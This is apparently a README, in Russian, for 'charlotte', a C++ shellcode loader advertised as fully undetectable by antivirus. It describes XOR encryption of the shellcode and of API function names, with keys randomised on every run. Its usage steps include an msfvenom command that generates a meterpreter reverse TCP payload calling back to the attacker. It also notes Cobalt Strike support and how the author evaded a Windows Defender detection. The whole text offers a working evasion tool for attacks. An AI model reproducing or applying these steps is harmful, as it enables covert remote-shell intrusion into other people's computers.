charlotte
c++ полностью необнаруживаемый загрузчик шеллкода ;)
выпускаю это в честь рождения моего новорожденного
описание
13/05/2021:
- загрузчик шеллкода на c++, полностью необнаруживаемый 0/26 по состоянию на 13 мая 2021 года.
- динамический вызов функций win32 api
- XOR-шифрование шеллкода и имён функций
- рандомизированные XOR-ключи и переменные при каждом запуске
- на Kali Linux просто 'apt-get install mingw-w64*' и всё!
17/05/2021:
- случайная длина строк и длина XOR-ключей
antiscan.me

использование
склонируйте репозиторий, сгенерируйте файл шеллкода с именем beacon.bin и запустите charlotte.py
пример:
- git clone https://github.com/9emin1/charlotte.git && apt-get install mingw-w64*
- cd charlotte
- msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=$YOUR_IP LPORT=$YOUR_PORT -f raw > beacon.bin
- python charlotte.py
- profit
протестировано с msfvenom -p (показано в .gif POC ниже), а также с полезной нагрузкой в сыром формате Cobalt Strike

обновление v1.1
17/05/21:
похоже, Microsoft Windows Defender смог обнаружить .DLL-бинарник,
и как они его засекли? ища несколько XOR-ключей размером 16 байт
изменение на 9 (показано в .gif POC ниже) показывает, что теперь он снова не обнаруживается
ура!
